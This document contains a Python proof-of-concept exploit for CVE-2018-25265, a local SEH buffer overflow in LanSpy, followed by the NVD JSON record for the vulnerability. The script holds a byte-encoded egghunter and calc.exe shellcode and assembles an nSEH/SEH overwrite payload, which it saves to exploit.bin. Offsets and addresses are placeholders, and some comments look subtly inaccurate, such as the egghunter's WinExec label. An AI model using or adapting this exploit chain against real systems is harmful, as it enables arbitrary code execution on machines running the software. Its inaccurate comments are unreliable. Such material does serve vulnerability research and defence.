CVE-2018-25265

#!/usr/bin/env python3 """ PoC for CVE-2018-25265 (LanSpy Local Buffer Overflow) This script generates a malicious payload to trigger the SEH overwrite. Note: Offset addresses need to be adjusted based on the specific binary version. """ import struct # Egghunter (kernel32!WinExec) egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") # Egg tag egg = "w00tw00t" # Calc.exe shellcode (generated by msfvenom) shellcode = ("\x31\xc9\x51\x68\x63\x61\x6c\x63\x54\xb8\xc7\x93\xc2\x77\xff\xd0" "\xcc") def generate_payload(offset, seh_address): """ Generates the malicious buffer. Structure: [Junk to Offset] + [nSEH] + [SEH Handler] + [Egghunter] + [Padding] + [Egg] + [Shellcode] """ # 1. Padding to reach the SEH record padding = b"A" * offset # 2. Next SEH handler (short jump to egghunter, usually 6 bytes back) # \xeb\x06\x90\x90 (JMP +6 + NOPs) nseh = b"\xeb\x06\x90\x90" # 3. SEH Handler address (POP POP RET instruction address) # This address must be from a non-ASLR module loaded by LanSpy seh = struct.pack("<I", seh_address) # 4. Egghunter code hunter = egghunter.encode('latin-1') # 5. Padding to ensure stability (optional) post_hunter_padding = b"C" * 100 # 6. Egg + Shellcode (placed further in memory) payload_chunk = egg.encode('latin-1') + shellcode.encode('latin-1') payload = padding + nseh + seh + hunter + post_hunter_padding + payload_chunk return payload if __name__ == "__main__": # Example usage (Offsets need debugging) # Assuming offset to SEH is roughly 1000 bytes for demonstration # Assuming a generic POP POP RET address (e.g., 0x10020120) offset = 1000 seh_addr = 0x10020120 buf = generate_payload(offset, seh_addr) print(f"[+] Generated Payload Length: {len(buf)}") print(f"[+] Payload Preview: {buf[:50]}...") # In a real scenario, this buffer would be sent to the vulnerable # LanSpy component or saved to a file that LanSpy parses. try: with open("exploit.bin", "wb") as f: f.write(buf) print("[+] Payload saved to exploit.bin") except Exception as e: print(f"[-] Error saving file: {e}")

{"cve": {"id": "CVE-2018-25265", "sourceIdentifier": "[email protected]", "published": "2026-04-22T16:16:46.907", "lastModified": "2026-04-27T17:28:49.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LanSpy 2.0.1.159 contains a local buffer overflow vulnerability in the scan section that allows local attackers to execute arbitrary code by exploiting structured exception handling mechanisms. Attackers can craft malicious payloads using egghunter techniques to locate and execute shellcode, triggering code execution through SEH chain manipulation and controlled jumps."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lizardsystems:lanspy:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.0.1.159", "matchCriteriaId": "E45C3D70-1AEC-401F-A2BC-AACC0C5F60DD"}]}]}], "references": [{"url": "https://lizardsystems.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46018", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/lanspy-local-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}